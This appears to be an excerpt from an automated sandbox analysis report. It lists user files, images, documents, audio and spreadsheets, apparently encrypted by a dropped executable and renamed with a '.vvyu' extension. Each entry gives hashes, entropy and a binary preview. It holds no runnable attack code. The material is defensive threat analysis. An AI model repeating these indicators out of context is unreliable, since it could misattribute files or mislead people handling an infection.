Preview:	EOWRV.$ nKg.... .$.F.N...Pm-..0....[rf..!..<d...g.."...u}..'+....:av..1.g...G..Z..q.n"...8.4q....{U.e...$5(....O......:...7u T....8T>..{....`h.J.....Ax#..............9<....D....d.p.\|2......B..k,.'g.'.A.\|.}....qM.r.......k.({?.../..0Q...._.1.....n.....D.:...l....../.@.._.5k......x......@..#%..x.'...,Y;K..A..\|..:h.]E....../.....a^\.....v..._;.tu..k=\|.]...(.G.........&.(%.bq".>.....:..sB?...A@...KJ..Z..]...-.^..X.vf.]?EQ....A..#.f]!..F..<hs.+-.].N)..po\.y0.V4)W. '.j...QO...#..e[`..n.{X.....#.-.9.!.\|...\..$..G.l...>.H.Y.k......].}.\;9.M5...xw.....W{.....).q......=.%,.F.F....j~v-.N._.,...D.c...yN...\|b.a.yK..)p..r..lp.....2.Zq(c......n%A.... .........Ok.L.....>`.{.g.:A..@.O.Ti..[....K/....f..p...Z....x.V.?G..^h.....LQ..A........N.{..X+=!ogTc.\|..^.%.8.[+.#..D.8.p....... .Mk8.u...M\..N.I..."K.vm...[f.'../....\.....N.w-.#.....j.:&}....p?.J*R+...q..nS..........Z..Sc;.i\.).....H.5V.8y..3L..FL....hE6.<......luS.$.....<.u.>.2.-..e[...&.

C:\Users\user\Documents\NVWZAPQSQL\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846296549959866
Encrypted:	false
SSDEEP:	24:sw+Snw0H1KGdzP+pWUFdqaSNGnjekyX+YesQBypZxsbD:sw9VKGdD+PqkjekyXd0By1mD
MD5:	89B3D2F03F6F72E0D51896CF3964CBA2
SHA1:	5D13FD922A9FEC186A27CFCFEA638D37FCDF6A40
SHA-256:	0B68BF64D90E1F2A4AFA5BD18F227776442EB9AF78DD5950726A55A57CF2DDA6
SHA-512:	DB4980CF82C44097543ED457F76BCFA97723484F41E6C55E868D46327B15F4E64B5C9F1B646593E4EF5DDDE1D4CFD60FB3FB0CC5C5F2F0295BDF7268EF373B57
Malicious:	false
Preview:	EWZCV..~.9x.g.Y?.1//O.....z..=.'uK.6..]..]1F;.8..w.!.czR.b3o..i.....S)..w.Y...vw..].....iT.....z5.u..p?.vA......}[. a5z.JY...u....L%..3`..sx..}E.}...JxK$..s?...cG.."o...S...@..B.V...&\..j.....O" kgw[....F..H.......<...w..Y^9.#.QB.HU...sN`....H...h.@0..O.P.h.d.I.J.....A`...cR....1)........G..`...~Yg.yr...<..Uf8..3..CtO...p...D.U.Z..e..l............g.)a/.6....I..-2;...d6..\|.o$.-.-.\|..Wx.It.y..........#.~S.r...v`..U.?)...T.(.K...p-L.e. ..Nk..P.y+{0..ym.z.....C,...+......b.k.!~......{L....q&..\.[..,@..^..Y.g...._(k..L".......B.....;8...%.l=.j^......H=;...{]GM.X.L.UUf#}.....<....h...]....Z..y.6jt..G....J.a9$E.e..V6$2..X..pl...r.r....Vl.&.a....:......#.b.r..f.c..%.......r....2.$d.j....X.@....?.<P....S....T..G..gH(...,]`^..Z.u}.y4....Q.lU.l...>l.p4^v..*....].0.....-d."./z.LC.?..&.....E.>......T"{..B3{rm..^...D.u/.P..JP....L.\q....a...(.$..N......E.r..mA.qn....${.bIK\.:r.Y-.u........?.......SX......fIguUU..a2n.!.&.."..NHB...&m..g.6..._6.%...

C:\Users\user\Documents\NVWZAPQSQL\EWZCVGNOWT.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846296549959866
Encrypted:	false
SSDEEP:	24:sw+Snw0H1KGdzP+pWUFdqaSNGnjekyX+YesQBypZxsbD:sw9VKGdD+PqkjekyXd0By1mD
MD5:	89B3D2F03F6F72E0D51896CF3964CBA2
SHA1:	5D13FD922A9FEC186A27CFCFEA638D37FCDF6A40
SHA-256:	0B68BF64D90E1F2A4AFA5BD18F227776442EB9AF78DD5950726A55A57CF2DDA6
SHA-512:	DB4980CF82C44097543ED457F76BCFA97723484F41E6C55E868D46327B15F4E64B5C9F1B646593E4EF5DDDE1D4CFD60FB3FB0CC5C5F2F0295BDF7268EF373B57
Malicious:	false
Preview:	EWZCV..~.9x.g.Y?.1//O.....z..=.'uK.6..]..]1F;.8..w.!.czR.b3o..i.....S)..w.Y...vw..].....iT.....z5.u..p?.vA......}[. a5z.JY...u....L%..3`..sx..}E.}...JxK$..s?...cG.."o...S...@..B.V...&\..j.....O" kgw[....F..H.......<...w..Y^9.#.QB.HU...sN`....H...h.@0..O.P.h.d.I.J.....A`...cR....1)........G..`...~Yg.yr...<..Uf8..3..CtO...p...D.U.Z..e..l............g.)a/.6....I..-2;...d6..\|.o$.-.-.\|..Wx.It.y..........#.~S.r...v`..U.?)...T.(.K...p-L.e. ..Nk..P.y+{0..ym.z.....C,...+......b.k.!~......{L....q&..\.[..,@..^..Y.g...._(k..L".......B.....;8...%.l=.j^......H=;...{]GM.X.L.UUf#}.....<....h...]....Z..y.6jt..G....J.a9$E.e..V6$2..X..pl...r.r....Vl.&.a....:......#.b.r..f.c..%.......r....2.$d.j....X.@....?.<P....S....T..G..gH(...,]`^..Z.u}.y4....Q.lU.l...>l.p4^v..*....].0.....-d."./z.LC.?..&.....E.>......T"{..B3{rm..^...D.u/.P..JP....L.\q....a...(.$..N......E.r..mA.qn....${.bIK\.:r.Y-.u........?.......SX......fIguUU..a2n.!.&.."..NHB...&m..g.6..._6.%...

C:\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857715353942217
Encrypted:	false
SSDEEP:	24:Fq6trVIztYibOyqZAXqpw/0fTwKpl65uKHjcQTiJObCXm0HxUtiktYNEXyGcIdLz:FP5yyiKWX+k2TwKpUbikbIm0at5MwytY
MD5:	591A096F116E4105DCD686AF2BEA7F3D
SHA1:	859B57B77CAC6F299DA2DCFF01BA6E551EB0AD6F
SHA-256:	71BD7DCD305244A572BCBBE7051647F85C81F62D94D1474C5523B83E14AD7AE1
SHA-512:	D28B2EB8DFEA186FE2AA599D1A4609019099BF92507ACD9AE515D2F108EC02E038E39F0ECC10E8500003C8D7ABD59FE9341BCACBD9E46021A17C2C0668496E52
Malicious:	false
Preview:	NVWZAA...)R(.a..'=5...vV.s..8..x.........X_c..,'...E.S.......0..Ao.Wp.....rN3..J/a...V..A.{.\|qE.\|.p.fP.h>...k-....z1.R.k.y5.m....+..$........s..x.o.9.`...\8...C..2.......0j/..EV......l.....".F....\l...;.}..EE.c78EHG.X........r..G.%.MT.SFK.-}Ix.v.R.F..fG..#A~...f-.K........\|._ZjR/L...l._p.Y..B.@>.v....Q.M..............+....Zh5..D.M.I.\].d.....l3..2f..i..=.C...+....D.6&..d......:.m..l..x..?.I..n>$.>&r>...eY3.l........X..._.._..O9.~..-"d......Yz...9...`z..8.~....L...J...A.iHZ...z.?P..A.w.,..UX..z.....L.Q{..d1.....B&.wd....G..".k.t..9.6QN..pHG.cp..3d.....:O..r...qfk.\|q.^.M.v.m...Ui.^8w/..O.$..%.J...X9......\|...A... .,4.@.....d...h..A?I..ix..,+\.....[d.P........sQ..?..]..0W..;.@.O.)f.}.....%\._PA.j..Y.qJ.H..&..mx7.^.a......:z....z.a.{.. .v..3..O..W9A.4.J.G..VJz.F...W..*-....F..]..dm...@..HPw....^..g.3.....6,...<.f{3..B..p....i["..4.<....y1.BF..h.....KD.....Xtsi...0L.bxi.{@]j;........Q^..1..a... v...IZ.t.q.............RK.kV.U..X.4

C:\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857715353942217
Encrypted:	false
SSDEEP:	24:Fq6trVIztYibOyqZAXqpw/0fTwKpl65uKHjcQTiJObCXm0HxUtiktYNEXyGcIdLz:FP5yyiKWX+k2TwKpUbikbIm0at5MwytY
MD5:	591A096F116E4105DCD686AF2BEA7F3D
SHA1:	859B57B77CAC6F299DA2DCFF01BA6E551EB0AD6F
SHA-256:	71BD7DCD305244A572BCBBE7051647F85C81F62D94D1474C5523B83E14AD7AE1
SHA-512:	D28B2EB8DFEA186FE2AA599D1A4609019099BF92507ACD9AE515D2F108EC02E038E39F0ECC10E8500003C8D7ABD59FE9341BCACBD9E46021A17C2C0668496E52
Malicious:	false
Preview:	NVWZAA...)R(.a..'=5...vV.s..8..x.........X_c..,'...E.S.......0..Ao.Wp.....rN3..J/a...V..A.{.\|qE.\|.p.fP.h>...k-....z1.R.k.y5.m....+..$........s..x.o.9.`...\8...C..2.......0j/..EV......l.....".F....\l...;.}..EE.c78EHG.X........r..G.%.MT.SFK.-}Ix.v.R.F..fG..#A~...f-.K........\|._ZjR/L...l._p.Y..B.@>.v....Q.M..............+....Zh5..D.M.I.\].d.....l3..2f..i..=.C...+....D.6&..d......:.m..l..x..?.I..n>$.>&r>...eY3.l........X..._.._..O9.~..-"d......Yz...9...`z..8.~....L...J...A.iHZ...z.?P..A.w.,..UX..z.....L.Q{..d1.....B&.wd....G..".k.t..9.6QN..pHG.cp..3d.....:O..r...qfk.\|q.^.M.v.m...Ui.^8w/..O.$..%.J...X9......\|...A... .,4.@.....d...h..A?I..ix..,+\.....[d.P........sQ..?..]..0W..;.@.O.)f.}.....%\._PA.j..Y.qJ.H..&..mx7.^.a......:z....z.a.{.. .v..3..O..W9A.4.J.G..VJz.F...W..*-....F..]..dm...@..HPw....^..g.3.....6,...<.f{3..B..p....i["..4.<....y1.BF..h.....KD.....Xtsi...0L.bxi.{@]j;........Q^..1..a... v...IZ.t.q.............RK.kV.U..X.4

C:\Users\user\Documents\NVWZAPQSQL\NYMMPCEIMA.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83766227752601
Encrypted:	false
SSDEEP:	24:W9dbJ/wnp4W+EPySVkR93tENCuMmrfQ+Q1L1MNIt+zQkt4VU1psbD:W9dtY+WLPBw93arod1LGmszN4yfmD
MD5:	5E03A527E6BDF6227E5098D5E9E530E6
SHA1:	19690A2D784A4A918C81046E6EA46015705F2AE3
SHA-256:	B389D76F8D652DEDF2CBC49F6C408D27FAEE7178BA71DFE2C4F47B11B8D67A73
SHA-512:	4794885E16EEF736594A384E168CD47BA37941AE932CB1E65F4F229F091AEAE6271FBB1E92E1240CD7BD11B533CF780B46D00E560B958B2BA05CFB66835C2A4D
Malicious:	false
Preview:	NYMMP.=.G...YV.O0j.LQQ..v[/M.-....h..J..8..s..3....~..^.O.-+.0@..#..[.Cg.G\|j#[. .]w.#^p.M.j.K.........Tb.......az(..5.&..w'oy...a..%.H.G0....k....~...^.9f......<k-.+MlB7..D..(..Y..Zz_.s,J[.8ji.)...$..k.....3........H..2rB.>R...N>.kQ._..0.........Z.........o3..~i.w..9..2'...k....]....D_....v...)0....DP..^....}.5....:$..I...&)..p.f...8.V..{->a..n8......F.2...A.$.........V..C...6d.5...n......LxK.Jrt...\.-....I...}...<&._........g..I.:+J..b.X.pE..:.V.j{go#.^.....4....D'.$...w.OL...S..k...s.L..jM..79MW.O.A.H...S,w..=G.....Y..-..b4">.n\..a........./....v.ei..TTH.T...I.s.$E#B}^V.....Lv>.=b+....J.\|.\.<...<rRD.2M.".+#..A.r0B.uElN:p....:.>.c....)y.2.s..EdEF\|m K.V,..;$.&.{)....o...)[UTll..."..O.a.t...........J...GP..?...\*....Hj.ca...hK%LUkc-..{-.`k...W.._.......m..Dot.....[..QY.......n.iv......[[.....(....\..YL1.c...1.8......Z.l5.U.EI...o@....Z.....dz.k"..-..Cdnl./p..,.7F.E..\...mbr.hP.iEQ..86..J...p4.P@.a.{.(N.v&.... 5#^"<u.Q...w.......u.

C:\Users\user\Documents\NVWZAPQSQL\NYMMPCEIMA.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83766227752601
Encrypted:	false
SSDEEP:	24:W9dbJ/wnp4W+EPySVkR93tENCuMmrfQ+Q1L1MNIt+zQkt4VU1psbD:W9dtY+WLPBw93arod1LGmszN4yfmD
MD5:	5E03A527E6BDF6227E5098D5E9E530E6
SHA1:	19690A2D784A4A918C81046E6EA46015705F2AE3
SHA-256:	B389D76F8D652DEDF2CBC49F6C408D27FAEE7178BA71DFE2C4F47B11B8D67A73
SHA-512:	4794885E16EEF736594A384E168CD47BA37941AE932CB1E65F4F229F091AEAE6271FBB1E92E1240CD7BD11B533CF780B46D00E560B958B2BA05CFB66835C2A4D
Malicious:	false
Preview:	NYMMP.=.G...YV.O0j.LQQ..v[/M.-....h..J..8..s..3....~..^.O.-+.0@..#..[.Cg.G\|j#[. .]w.#^p.M.j.K.........Tb.......az(..5.&..w'oy...a..%.H.G0....k....~...^.9f......<k-.+MlB7..D..(..Y..Zz_.s,J[.8ji.)...$..k.....3........H..2rB.>R...N>.kQ._..0.........Z.........o3..~i.w..9..2'...k....]....D_....v...)0....DP..^....}.5....:$..I...&)..p.f...8.V..{->a..n8......F.2...A.$.........V..C...6d.5...n......LxK.Jrt...\.-....I...}...<&._........g..I.:+J..b.X.pE..:.V.j{go#.^.....4....D'.$...w.OL...S..k...s.L..jM..79MW.O.A.H...S,w..=G.....Y..-..b4">.n\..a........./....v.ei..TTH.T...I.s.$E#B}^V.....Lv>.=b+....J.\|.\.<...<rRD.2M.".+#..A.r0B.uElN:p....:.>.c....)y.2.s..EdEF\|m K.V,..;$.&.{)....o...)[UTll..."..O.a.t...........J...GP..?...\*....Hj.ca...hK%LUkc-..{-.`k...W.._.......m..Dot.....[..QY.......n.iv......[[.....(....\..YL1.c...1.8......Z.l5.U.EI...o@....Z.....dz.k"..-..Cdnl./p..,.7F.E..\...mbr.hP.iEQ..86..J...p4.P@.a.{.(N.v&.... 5#^"<u.Q...w.......u.

C:\Users\user\Documents\NVWZAPQSQL\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866652159648866
Encrypted:	false
SSDEEP:	24:vLSIO9lr/a4NZ4FPEPPCLjetNgHZwhWS6SBcQW28tvJsbD:nOfHkEPautCHOhWS6HQW2KJmD
MD5:	251A6C9DBC13D8D4EF9273545BB068B3
SHA1:	EE8CBD555B3BFA68D2518C283D5AEF48CF50326F
SHA-256:	9C4187B083C26F7C85BB85514A19CABD0D427522C367E6F304EB7C0D2235A34E
SHA-512:	62BE5299E2509E73D3BA1429EED7E9EB562C757FFECFD8543429370BC1F6685C6F3C7CCF3462CE9A40035D4AD97F2442F60F1E21714BF825EBF4CF15927B4F29
Malicious:	false
Preview:	TQDFJ.g)...#ok~.V.:..`.._.W..v.I....%.}Q.y..".....X.b..8r...].S...t..Ma.=}..Ph...%c........)j.....v.)$..Z.....@A..f.....b8..\)..Y{.......<....v..U\|....a6...A..f...#..o..8".kb"V.....K.p.H\|..uA./<~+.2.....)1/....o[..}.y.{...9..h....#....'.....e.p}.."..p....v."./Z2<n...KD..\|....A.G.i._...=..rE.\........S.'...2).xzD.@d..M..!]..u.H......3OKv.\.%....ZD>..Q.....^.h..f.+..z?s...aq..{n.y......%........_.....>....#.P....$.....EP.{.K...z....._.1r....f..ZI.d.G..y.F.;...51!.kE.V.w.......V...y.d.Vf..K.B61E.....$T...cG.1..]...,0.....VBu...N.(.`..\.Az...g.r.Sw.j..= . ....^Z...E..(.J ...u...#Kzl.....{!y.\t-...N...!....Ca7W.t(F....m....5?G_.....R.x.o.$r..w{..wh..Y.:.].\...a....zG2.IU.X...d......J(L.xa.". .r3~9..k.L.o....$a....yT:U..I.2;..~.P..X..`...../1........d".Zu..l........&)!O.7 .m.....S..........S]I...2.3..:....N\....9._.w.....O.t....T.V..&.....H..A... .!.O..{.".../'..+.........$..d..&V........oe...o'E...[.8...O..Pi.W9T....a....f...9..4...

C:\Users\user\Documents\NVWZAPQSQL\TQDFJHPUIU.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866652159648866
Encrypted:	false
SSDEEP:	24:vLSIO9lr/a4NZ4FPEPPCLjetNgHZwhWS6SBcQW28tvJsbD:nOfHkEPautCHOhWS6HQW2KJmD
MD5:	251A6C9DBC13D8D4EF9273545BB068B3
SHA1:	EE8CBD555B3BFA68D2518C283D5AEF48CF50326F
SHA-256:	9C4187B083C26F7C85BB85514A19CABD0D427522C367E6F304EB7C0D2235A34E
SHA-512:	62BE5299E2509E73D3BA1429EED7E9EB562C757FFECFD8543429370BC1F6685C6F3C7CCF3462CE9A40035D4AD97F2442F60F1E21714BF825EBF4CF15927B4F29
Malicious:	false
Preview:	TQDFJ.g)...#ok~.V.:..`.._.W..v.I....%.}Q.y..".....X.b..8r...].S...t..Ma.=}..Ph...%c........)j.....v.)$..Z.....@A..f.....b8..\)..Y{.......<....v..U\|....a6...A..f...#..o..8".kb"V.....K.p.H\|..uA./<~+.2.....)1/....o[..}.y.{...9..h....#....'.....e.p}.."..p....v."./Z2<n...KD..\|....A.G.i._...=..rE.\........S.'...2).xzD.@d..M..!]..u.H......3OKv.\.%....ZD>..Q.....^.h..f.+..z?s...aq..{n.y......%........_.....>....#.P....$.....EP.{.K...z....._.1r....f..ZI.d.G..y.F.;...51!.kE.V.w.......V...y.d.Vf..K.B61E.....$T...cG.1..]...,0.....VBu...N.(.`..\.Az...g.r.Sw.j..= . ....^Z...E..(.J ...u...#Kzl.....{!y.\t-...N...!....Ca7W.t(F....m....5?G_.....R.x.o.$r..w{..wh..Y.:.].\...a....zG2.IU.X...d......J(L.xa.". .r3~9..k.L.o....$a....yT:U..I.2;..~.P..X..`...../1........d".Zu..l........&)!O.7 .m.....S..........S]I...2.3..:....N\....9._.w.....O.t....T.V..&.....H..A... .!.O..{.".../'..+.........$..d..&V........oe...o'E...[.8...O..Pi.W9T....a....f...9..4...

C:\Users\user\Documents\NYMMPCEIMA.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848539187930947
Encrypted:	false
SSDEEP:	24:KQkOPFFNydBgCRo0vbtGZ0joy50NqUckZ0YVp6SKkc3PuVSBt8LWwXct+oSc1Dah:KbOPjmv7j7mTC66SKkc/oS2WwXc+Pqah
MD5:	6DCB0AB16248C120EC946495D2900111
SHA1:	596D34E72A09D6FF37CC4024C91E7E4C22C080D0
SHA-256:	79FD2C5C0CA3E52A386E3DC47F1A85166882CFECB2BA7F4AD23C2348B5D08930
SHA-512:	A3F54A0D23F48D49E8770E5D620408DA177AF3A4374E7138D54CE78A7B534E8652EA3428328AE97DB8F97273DB1822495691EBB0FB8739890FB3795EDB2D174B
Malicious:	false
Preview:	NYMMP..-...T.0...GW.^.j.y..!.8C..Q31..z[...RM..a}..Z#...... ...G%....A.6.zuP\|.].^..vJ.yV....... ...u7............b....r.........H....7.V[.9....s...........e..:;....&...<..>...{..e...R..?..e..7..t245.w .".zF..k..C..h..S..;.....xuaz.3......>..%....dCI.......h.Z.5@w\|u....kO..p..{..:....X$...p.b..`;W....47..PS..".L/.T.2....8..B%R9..^B.+.O...=...O2.1.D..2..9c.]D....n.MBajc....S..b0+...n%8a+.'.C.y..gQ....W3.........f.d:.?".m..5.hbV..z.).o_....flg...a".......$..nul./p8.97F.H\.v.a.i3.e..6IsN.Hq...>.!...fT.c..2..h......klkB.mP.Y....?.;.-y...0q.....$...$.S.jt.r.T..y..K.}.E'.X...P<Q.....94T..,....B..V80$./....U..O.L.xq..I..+1.J...\..40t...g4Y$.[gv....rZ.WWo.WT#..R&...v.> P..U....=.1.......Ay.0.E:..~7...U.~.....v5...".8..#..CC..R.A~%..2.h..Y.\s....$...x...j... ./..i.8=`v...n...'w....."F.^...`...m$.]".h..q..C$.).....\|3...D~..j.....S.!.B...*...6S...UM.w.#l.P...}q...fg...ZwWdV.i..8....4..C..........v.Y..>..1%.@1G.;.R.A.\...TJ....kE,T..V.-..c

C:\Users\user\Documents\NYMMPCEIMA.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848539187930947
Encrypted:	false
SSDEEP:	24:KQkOPFFNydBgCRo0vbtGZ0joy50NqUckZ0YVp6SKkc3PuVSBt8LWwXct+oSc1Dah:KbOPjmv7j7mTC66SKkc/oS2WwXc+Pqah
MD5:	6DCB0AB16248C120EC946495D2900111
SHA1:	596D34E72A09D6FF37CC4024C91E7E4C22C080D0
SHA-256:	79FD2C5C0CA3E52A386E3DC47F1A85166882CFECB2BA7F4AD23C2348B5D08930
SHA-512:	A3F54A0D23F48D49E8770E5D620408DA177AF3A4374E7138D54CE78A7B534E8652EA3428328AE97DB8F97273DB1822495691EBB0FB8739890FB3795EDB2D174B
Malicious:	false
Preview:	NYMMP..-...T.0...GW.^.j.y..!.8C..Q31..z[...RM..a}..Z#...... ...G%....A.6.zuP\|.].^..vJ.yV....... ...u7............b....r.........H....7.V[.9....s...........e..:;....&...<..>...{..e...R..?..e..7..t245.w .".zF..k..C..h..S..;.....xuaz.3......>..%....dCI.......h.Z.5@w\|u....kO..p..{..:....X$...p.b..`;W....47..PS..".L/.T.2....8..B%R9..^B.+.O...=...O2.1.D..2..9c.]D....n.MBajc....S..b0+...n%8a+.'.C.y..gQ....W3.........f.d:.?".m..5.hbV..z.).o_....flg...a".......$..nul./p8.97F.H\.v.a.i3.e..6IsN.Hq...>.!...fT.c..2..h......klkB.mP.Y....?.;.-y...0q.....$...$.S.jt.r.T..y..K.}.E'.X...P<Q.....94T..,....B..V80$./....U..O.L.xq..I..+1.J...\..40t...g4Y$.[gv....rZ.WWo.WT#..R&...v.> P..U....=.1.......Ay.0.E:..~7...U.~.....v5...".8..#..CC..R.A~%..2.h..Y.\s....$...x...j... ./..i.8=`v...n...'w....."F.^...`...m$.]".h..q..C$.).....\|3...D~..j.....S.!.B...*...6S...UM.w.#l.P...}q...fg...ZwWdV.i..8....4..C..........v.Y..>..1%.@1G.;.R.A.\...TJ....kE,T..V.-..c

C:\Users\user\Documents\SQSJKEBWDT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866670753257986
Encrypted:	false
SSDEEP:	24:n0LtvAjQfilqegH9osWmjo+5yA3wOzK9yBB016KIAym0/CeasQ/MWJnGgi6sbD:0LYlqXam3y6wkK9yBB016CyYeanHW6mD
MD5:	76C3AA87BD8DFA0732EF3D8D3B068D98
SHA1:	4DFB1640D052AAC7E5DEC5F16A577A66B68E8057
SHA-256:	603E0C41821520B1D4ACB1DF0F8EF2BD80BD85391B861900D42A906C179C4FD4
SHA-512:	566930767135689965DB44B0DCC6B54800298E50687079683120B513ECF90517254275525A1164E75970755BB7057005D52E26DB920BBCC22111A5AE9A0C377E
Malicious:	false
Preview:	SQSJK..z..O......K...>.!........&..y=I.l........<GC.....R..CM=..(Y.]..q.Q.4y..Y..~..k.+..E3..y...K.\|w.`.'.G.a..<X1.lx./b:....I@.,r.-a...L[..i.-YX.Wa.<.=.,e.Yd#..;.S.I/d....._G..'XzS...G.U(.4.O.......h.6.X-N...!....~..&..?..=.=..B?..4~.x95X.h...F.d.../.p...X.,..S..W...j-8.b%i.i\..=..............HW...h.3........s..z...P$...-...~..?..2..0a....._..t..W."...5...\........p...3.@..VLR......u0&..]....2A.....F..Pa4.9C..2Jq...@.&....X.....a.o.%G..\wu......+9.SR.@..%[K.k.1..G...-G..........J.["Ta.9+1U...F..%...D.vD.6..9.^v.F.G.`tZ.{..f2...........$.F.R$...t$.GlL.7....I.G..gf5/(r.5.\|.;....P.}..\|g..u.]F.r.....}./F..I.......P...WX.......\...U_.zKPQ.}?...d..f.H...d(......KQ...Y...v'...\W..\|..q....>.b....1&..5.ho:J...\|.wD.g.0.d.N..3H.7...2.u.Z..ZO O+.....r.wh.^5.....,.2..T.i.>.0.?.......>.O.2}A....mn..Hee?.(.:^..I..-../T..... ..Y...~Yn...b5g..o].v.+....S.% ...Z.qz...87......L..^..X.:......ei.^t.a..Or.....:.Q....L...J.g..C-........~r......

C:\Users\user\Documents\SQSJKEBWDT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866670753257986
Encrypted:	false
SSDEEP:	24:n0LtvAjQfilqegH9osWmjo+5yA3wOzK9yBB016KIAym0/CeasQ/MWJnGgi6sbD:0LYlqXam3y6wkK9yBB016CyYeanHW6mD
MD5:	76C3AA87BD8DFA0732EF3D8D3B068D98
SHA1:	4DFB1640D052AAC7E5DEC5F16A577A66B68E8057
SHA-256:	603E0C41821520B1D4ACB1DF0F8EF2BD80BD85391B861900D42A906C179C4FD4
SHA-512:	566930767135689965DB44B0DCC6B54800298E50687079683120B513ECF90517254275525A1164E75970755BB7057005D52E26DB920BBCC22111A5AE9A0C377E
Malicious:	false
Preview:	SQSJK..z..O......K...>.!........&..y=I.l........<GC.....R..CM=..(Y.]..q.Q.4y..Y..~..k.+..E3..y...K.\|w.`.'.G.a..<X1.lx./b:....I@.,r.-a...L[..i.-YX.Wa.<.=.,e.Yd#..;.S.I/d....._G..'XzS...G.U(.4.O.......h.6.X-N...!....~..&..?..=.=..B?..4~.x95X.h...F.d.../.p...X.,..S..W...j-8.b%i.i\..=..............HW...h.3........s..z...P$...-...~..?..2..0a....._..t..W."...5...\........p...3.@..VLR......u0&..]....2A.....F..Pa4.9C..2Jq...@.&....X.....a.o.%G..\wu......+9.SR.@..%[K.k.1..G...-G..........J.["Ta.9+1U...F..%...D.vD.6..9.^v.F.G.`tZ.{..f2...........$.F.R$...t$.GlL.7....I.G..gf5/(r.5.\|.;....P.}..\|g..u.]F.r.....}./F..I.......P...WX.......\...U_.zKPQ.}?...d..f.H...d(......KQ...Y...v'...\W..\|..q....>.b....1&..5.ho:J...\|.wD.g.0.d.N..3H.7...2.u.Z..ZO O+.....r.wh.^5.....,.2..T.i.>.0.?.......>.O.2}A....mn..Hee?.(.:^..I..-../T..... ..Y...~Yn...b5g..o].v.+....S.% ...Z.qz...87......L..^..X.:......ei.^t.a..Or.....:.Q....L...J.g..C-........~r......

C:\Users\user\Documents\SQSJKEBWDT\BJZFPPWAPT.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846685858452274
Encrypted:	false
SSDEEP:	24:wvtZYA0PSWoGDI7v+0y+iz1Po+99DzaYQJE0Ec6jDCGi2C6sbD:IZ7oWeI720y7tlQJE0ERDBmD
MD5:	B76E02FF5A0E6C139A2C34971A590AB6
SHA1:	94A64F9DAE59785213A94D51C99C64F93AB625DA
SHA-256:	114679D7AE43434A4D04F0AF9A785ADDB9E7592010A1AA4AF60B358D87C9D07C
SHA-512:	754CF1E7899B4C1267B520CA9F56B5E19445FDFD9B1C2518F46B58C06BC30AB992F0F3C615EC13DAAE2171AEFF78A5963FC3C0AEEB4AF2F3C23CADAFA1F95A53
Malicious:	false
Preview:	BJZFP...$.i;w^q....[3.\Q:.XT.^.a..]..._.M.#4.Z..t....'....wb.=? .0.R=K.@. a..L..\|.....#.....On.............uK..G.....,..e...I.<Zg...~E!.z~n...../.E.O-.#.k...........I....&..H.:..FNF.b....s.~1..jg..........9xE..+o}iQ1._U.>.{.Z.....>...?Q0.B....Bm.2.....&Z.............E..d...N.....A.....$}\1..RQa....s.}.jW...:./....6...Q....Q..M...z..E..;.@.W...U;.kj?.T.....F.$m....._..cF]......p:......9...X..zSJ$.D....x)..,..f....'H.P..A.........J...v.z+.....~f.....O.i.....Lb..K..t..E..z.- .A},...u.u..A.....f`....h.A..-..s....k.i......obDQd.......[p.H..8D.... .]..).!.pA.k....k...J..."C..(J....../.........,B..d~.a......H.........I.*.n...T@..).G......T.......7<.].,..U..a .9......7^..m.....@i.....!c....!.4..s..v+m........P......A_.>.z."9.xA..g\|..k.'..z...`..8.!...Y../.dz......s...s.M........_ ^.).....x.>.U$dj.._...Y.m...2.......6.`Y..e...i..{..........B..Y....V.`5f9. ARzaO......hb.<%..o.C....v.vJ......^.)..@......>..At...kH..^.....M...~.]7..`

C:\Users\user\Documents\SQSJKEBWDT\BJZFPPWAPT.mp3.vvyu (copy)

Download File

